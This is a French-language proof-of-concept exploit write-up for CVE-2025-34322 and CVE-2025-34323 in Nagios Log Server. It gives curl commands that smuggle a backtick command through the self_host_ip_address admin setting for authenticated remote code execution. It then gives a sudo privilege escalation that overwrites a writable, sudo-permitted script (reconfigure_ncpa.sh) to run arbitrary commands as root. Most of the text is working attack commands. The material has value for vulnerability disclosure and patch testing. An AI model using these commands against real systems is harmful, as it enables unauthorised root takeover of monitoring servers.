
Preuves de concept d'exploits pour CVE-2025-34322 et CVE-2025-34323 dans Nagios Log Server
Preuves de concept pour les exploits CVE-2025-34322 et CVE-2025-34323 dans Nagios Log Server, ainsi qu'un script combiné pour obtenir un shell root.
Après authentification, remplacez votre identifiant de session dans ces deux commandes curl. La première définit la commande à exécuter, la suivante exécutera la commande :
$ curl -s -H 'Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; ls_session=<your-session-id>' --data 'csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d&natural_language_query=1&nlp_disclaimer=on&ai_provider=self_hosted&self_host_ip_address=`touch /tmp/rce`&ai_port=8000&saveglobals=1' http://192.168.122.198/nagioslogserver/admin/globals
$ curl -s -H 'Cookie: ls_session=<your-session-id>' http://192.168.122.198/nagioslogserver/dashboard/natural_language_to_query
L'utilisateur www-data a les droits sudo pour exécuter le script suivant en tant que root :
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/profile.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh
et le répertoire /usr/local/nagioslogserver/scripts est accessible en écriture
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver$ ls -lah
total 44K
drwxrwxr-x 11 nagios nagios 4.0K Sep 7 16:34 .
drwxr-xr-x 12 root root 4.0K Sep 7 16:29 ..
drwxrwxr-x 4 nagios nagios 4.0K Sep 7 16:20 etc
-rw-r--r-- 1 root root 0 Sep 7 16:34 .installed
drwxr-xr-x 14 nagios nagios 4.0K Sep 7 16:29 logstash
drwxrwxr-x 2 nagios nagios 4.0K Sep 7 16:20 mibs
drwxr-xr-x 12 nagios nagios 4.0K Sep 7 16:20 opensearch
drwxrwxr-x 5 nagios nagios 4.0K Sep 7 16:20 pythonvenv
drwxrwxr-x 3 nagios nagios 4.0K Sep 7 16:20 scripts
drwxrwxr-x 2 nagios nagios 4.0K Sep 7 16:36 snapshots
drwxrwxr-x 3 nagios www-data 4.0K Sep 7 16:36 tmp
drwxrwxr-x 2 nagios nagios 4.0K Sep 7 16:31 var
car l'utilisateur www-data est membre du groupe nagios. Par conséquent, l'utilisateur www-data peut déplacer n'importe quel fichier dans le répertoire, indépendamment du propriétaire. Les commandes suivantes déplaceront un fichier (reconfigure_ncpa.sh) que l'utilisateur www-data peut exécuter avec les droits sudo, puis remplaceront le fichier par un nouveau fichier contenant des commandes arbitraires :
mv /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak;
echo '<command>' > /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chmod +x /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
sleep 1;
sudo /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;